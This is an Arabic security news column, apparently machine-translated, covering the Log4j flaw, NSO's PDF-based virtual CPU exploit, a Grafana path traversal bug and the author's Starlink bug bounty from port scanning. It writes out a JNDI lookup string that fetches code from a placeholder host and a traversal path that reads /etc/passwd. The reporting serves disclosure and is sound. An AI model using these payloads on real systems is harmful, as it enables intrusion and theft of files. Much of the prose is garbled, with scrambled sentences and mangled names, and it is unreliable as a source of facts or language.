الأخبار الضخمة هذا الأسبوع هي LOG4J، وكسر بضع ساعات فقط في وقت متأخر حتى يتم تضمينها في عمود الأسبوع الماضي. يسأل الناس بالفعل عما إذا كانت هذه هي الضعف الأكثر خطورة على الإطلاق، وكذلك تبدو وكأنها على الأقل في التشغيل. تم العثور على الخلل أولا من قبل خبراء الأمن في علي بابا، الذين أبلغوا أباتشي للخلل في 24 نوفمبر. سحبت Cloudflare بياناتها، وكذلك الأدلة المكتشفة على الضعف في البرية في وقت مبكر من 1 ديسمبر. هذه الأمثلة المبكرة متناثرة للغاية بالإضافة إلى مستهدفة للغاية وكافية لجعلني سؤال إذا لم يكن هذا الباحثين كانوا جزءا من الكشف الأولي القيام بدراسة بحثية إضافية حول المشكلة. بغض النظر، في 9 ديسمبر، قام فردي تويتر بتغريد تفاصيل الضعف، وكذلك كسر الجحيم الأمني. بعد تسع دقائق من سقسقة، رأت Cloudflare محاولة استغلال مرة أخرى، وكذلك خلال ثماني ساعات، كانوا يتعاملون مع 20،000 محاولة استغلال في الدقيقة.
هذا هو الجدول الزمني، ولكن ما الذي يحدث مع استغلال، وكذلك لماذا هو سيء للغاية؟ أولا، الحزمة الضعيفة هي log4j، مكتبة تسجيل جافا. إنها تمكن العمليات من الحصول على رسائل السجل حيث تتطلب أن تذهب، ولكن مع الكثير من الأجراس وكذلك صفارات مضمنة. واحدة من هذه الميزات هي دعم JNDI، وهي مشكلة أمنية مفهومة في جافا. يمكن أن يؤدي طلب JNDI إلى هجوم التحمل، حيث يتم تشويه دفق البيانات الواردة بشكل ضار، سوء التصرف عندما يتم توسيعه مرة أخرى إلى كائن. لم يكن المقصود بالنسبة لتلك التي يبحث عن jndi عبر الإنترنت، ومع ذلك لم يكن هناك فحص صريح لهذا السلوك، فهذا نحن هنا.
الفكر النهائي هو أنه إذا كنت تستطيع تشغيل سجل إنشاء LOG4J يتضمن $ {JNDI: LDAP: //example.com/a}، يمكنك تشغيل رمز تعسفي على هذا الجهاز. لقد توصل الباحثون وكذلك المجرمين بالفعل إلى طرق مبتكرة للتعامل مع ذلك، مثل بما في ذلك السلسلة في وكيل المتصفح، أو الاسم الأول جدا. نعم، إنها عودة Tible Bobby Tables.Log4J 2.16.0. 2.15.0 احتوى على إصلاح جزئي، ومع ذلك لم يتخلص تماما من المشكلة. قامت Java المحدثة بتغيير الإعداد الافتراضي، وتوفير التخفيف الجزئي. ومع ذلك، فإننا على الأرجح لم نر نهاية هذا بعد.
NSO وكذلك وحدة المعالجة المركزية محاكمة في PDF
لو كان أي شخص آخر غير وظيفة Google صفرية أخبر هذه القصة، وأود أن تفجيرها كجهاز مؤامرة هوليوود الفقيرة. هذه الضعف في تطبيق IOS IMESSAGE، وكذلك كيف يتعامل مع بيانات .gif التي تحتوي على بيانات PDF حقا. PDF مرنة، لوضعها أقل ما يقال. أحد أنماط الترميز الممكنة هو JBIG2، أسود بالإضافة إلى برنامج ضغط الضغط الأبيض من 2000. جزء من برنامج الترميز هو القدرة على استخدام المشغلين المنطقيين، أو، XOR، وكذلك XNOR لتمثيل الاختلافات الطفيفة بين الكتل المضغوطة. يتيح الفضل عدد صحيح في رمز الضغط المزيد من الذاكرة التي يجب التفكير فيها حول الإخراج الساري الناتج عن الضغط، مما يعني أن رمز الضغط يمكن أن يقوم بتشغيل هؤلاء المشغلين المنطقيين على هذه الذاكرة الإضافية.
الآن ما تحصل عليه عندما يكون لديك الكثير من الذاكرة وكذلك المشغلين الأربعة؟ إجمالي وحدة المعالجة المركزية تورج، بالطبع. نعم، طورت الباحثون في مجموعة NSO حقا وحدة المعالجة المركزية عبر الإنترنت في روتين فك تشفير PDF، وكذلك الاستفادة من النظام الأساسي لإصلاح الهروب من الرمل. إنه مجنون، لا يصدق، وكذلك لامع. [ed ملاحظة: وكذلك الفقراء مجموعة NSO هي شريرة في الأساس.]
جرافانا مسار اجتياز
منصة التصور GRAFANA فقط تم إصلاح مشكلة خطيرة مؤخرا، CVE-2021-43798. تتيح هذه الضعف من أجل اجتياز المسار عبر مجلدات البرنامج المساعد. لذلك على سبيل المثال، /Public/Plugins/alertlist/../../../../../../../../etc/passwd سيعود بيانات Passwd من خادم Linux. تم إصدار تحديثات إصلاح هذه المشكلة في 7 ديسمبر. كان هذا الخطأ حقا 0 يوما لبضعة أيام، حيث تم مناقشته على الثالث علنيا، مهن غير معروفة في Grafana Devs. فحص ما بعد postmortem للحصول على التفاصيل.
النجمة
وأخيرا، لدي بعض الدراسة البحثية الأصلية لتغطية. قد تكون على دراية عملي الذي يغطي نظام الويب الأقمار الصناعي. جزء من الدافع للشراء وكذلك الحفاظ على النجمة كان هو القيام بدراسة البحث الأمني على المنصة، وكذلك هذا الهدف قد ولدت أخيرا بعض الفاكهة – لحن مستوى مكافأة بقيمة 4800 دولار. ها هي القصة.
لدي صديق قريب من الصديق الذي يستخدم بالمثال النجمة، وكذلك في 7 ديسمبر، اكتشفنا أن كلاهما تم تعيين كلاهما عنوان IPv4 غير قابل للتوجيه علنا. بالضبط كيف يعمل توجيه النجوم بين المشتركين؟ هل سيتم إرسال حركة مرور الويب من شبكتي إلى توجيهه مباشرة على القمر الصناعي، أو سيتعين على كل حزمة ترتد قبالة القمر الصناعي، مع محطة SpaceX الأرضية، مرة أخرى إلى الطائر، وكذلك العودة إلي؟ Traceroute هي أداة رائعة، وكذلك الاستجابة للسؤال:
Traceroute إلى 98.97.92.x (98.97.92.x)، 30 قفزات كحد أقصى، 46 حزمة بايت
1 customer.dllstxx1.pop.starlinkisp.net (98.97.80.1) 25.830 MS 24.020 MS 23.082 MS
2 172.16.248.6 (172.16.248.6) 27.783 مللي ثانية 23.973 مللي 27.363 مللي ثانية
3 172.16.248.21 (172.16.248.21) 23.728 MS 26.880 MS 28.299 MS
4 undefined.hostname.localhost (98.97.92.x) 59.220 MS 51.474 MS 51.877 MS
لم نفهم بالضبط ما كان كل هوب، ومع ذلك، فإن عدد القفزات وكذلك الكمون لكل ما يجعله يزيل نسبيا أن حركة المرور الخاصة بنا كانت تسير مع محطة أرضية. ومع ذلك، هناك شيء غريب عن هذا Traceroute. هل المنطقة ذلك؟ 172.16.x.y هي شبكة شخصية، وفقا ل RFC1918. الحقيقة التي تظهر في Traceroute تعني أن جهاز توجيه OpenWRT الخاص بي وكذلك أجهزة النجوم تتوجه بشكل فعال من سطح المكتب الخاص بي إلى هذا العنوان. لقد اكتشفت الآن هذا النوع من الأشياء من قبل، على شبكة مزود خدمة الإنترنت المختلفة. إن فهم أن هذا قد يكون مثيرا للاهتمام، لقد قدمت NMAP بالإضافة إلى مسح IPS الشخصي الذي ظهر في Traceroute. البنغو.
172.16.248.6 تم تأمينه بشكل صحيح، ولكن 172.16.248.21 أظهرت موانئ مفتوحة. وهي الموانئ 179، 9100، 9101، بالإضافة إلى 50051. تعتقد NMAP 179 BGP، والتي بدت عن اليمين. لكن البقية منهم؟ telnet. كنت إيجابية نسبيا أن أيا من هذه كانت خدمات Telnet حقا، ولكنها تبدأ رائعة عند محاولة تحديد خدمة غير معروفة. لم يكن هذا استثناء. أخبرتني المنافذ 9100 وكذلك 9101 أنني قد قدمت طلبا ضعيفا، ورمي الخطأ 400s. آه، كانوا خدمات HTTP! قدمت سحبنا في متصفح الويب لي إخراج تصحيح يبدو أنه من خادم قارورة بيثون.
كان هذا المنفذ الأخير، 50051، مثيرة للاهتمام. الخدمة الوحيدة التي قد اكتشفتها التي تم تشغيلها عادة كان هناك Google’s Gropc، بروتوكول مكالمة هاتفية عن بعد. جاء GRPC_CLI في متناول يدي للتحقق من أن ما وجدته. لسوء الحظ، تم تعطيل الانعكاس، مما يعني أن الخدمة رفضت تعداد الأوامر التي أيدتها. رسم خرائط أي نوع من الأوامر ستحتاج إلى رمي الكثير من البيانات في هذا المنفذ.
في هذه المرحلة، بدأت في السؤال بالضبط ما هي قطعة الأجهزة التي كنت أتحدث إليها. فعلت BGP، لقد كانت داخلية لشبكة Starlink، وكذلك حركة الويب الخاصة بي تتوجيه معها. قد يكون هذا القمر الصناعي؟ على الأرجح لا، ولكن BUNTY BUNTY StarLink حذف تماما حول ما يجب أن يأتي بعد ذلك. تحت أي ظرف من الظروف يجب أن يقوم الباحث باختبار عبر الإنترنت على القمر الصناعي أو البنية التحتية الحاسمة الأخرى. اشتبك في أنني كنت أتحدث إلى جزء من البنية التحتية التوجيهية، على الأرجح في المحطة الأرضية في دالاس. وفي كلتا الحالتين، تمزق الصعب أيضا وكذلك كسر شيء ما، لذلك قمت بتأليف الكشف حول ما وجدته.
كان لدى مهندسي Starlink أغلقت المنافذ في غضون اثني عشر ساعة من التقرير، وكذلك طلب مني أن تحقق من الصلاحية. بالتأكيد بما فيه الكفاية، في حين أنني ربما لا يزال بينغ IPS الشخصية، لم تكن هناك منافذ مفتوحة. هنا هو المكان الذي يجب أن أقوم به تاريخ الائتمان الذي يقوم بتشغيل Bust SPASEX Starlink Buge Bounty. قد يكون لهم دعا هذه الكشف عن معلومات بسيطة، ودفعت بضع مئات من الدولارات، وكذلك يسمىها في اليوم. بدلا من ذلك، استغرقوا وقت التحقيق وكذلك التحقق من أنني قد عثرت بالفعل على منفذ GRPC مفتوح، وكذلك اسقطت القنبلة التي كانت نقطة نهاية غير مصالبة. اكتشف اكتشاف جائزة أولية قدرها 3،800 دولار، بالإضافة إلى مكافأة 1000 دولار للحصول على تقرير شامل وكذلك لا تحطم أنظمتها عبر الإنترنت. نظرا لأن رفيقي الإقليمي، فقد وضعه نصف مازحا، فهذا هو الكثير من المال لتشغيل NMAP.
نعم، كان هناك الكثير من الحظ المعني، متكامل مع قدر كبير من الخبرة السابقة مع Quirks الشبكة. يجب أن يكون الوجبات الجاهزة الأساسية أن دراسة الأبحاث الأمنية لا يجب أن تكون دائما ضعف شديد التحدي وكذلك استغلال التنمية. ليس لديك لتطوير نظام كامل تورينج في PDF. في بعض الأحيان إنه مجرد بروتوكول الإنترنت بالإضافة إلى مسح الميناء، مدمجة مع الثبات وكذلك القليل من الحظ. في الواقع، إذا كان لدى مزود خدمة الإنترنت لديك برنامج Bug Bounty، فقد تحاول توصيل جهاز Linux مباشرة في المودم، بالإضافة إلى مسح نطاق IP الشخصي. أبق أعينك مفتوحة. أنت كذلك فقط قد تكتشف شيئا مثيرا للاهتمام.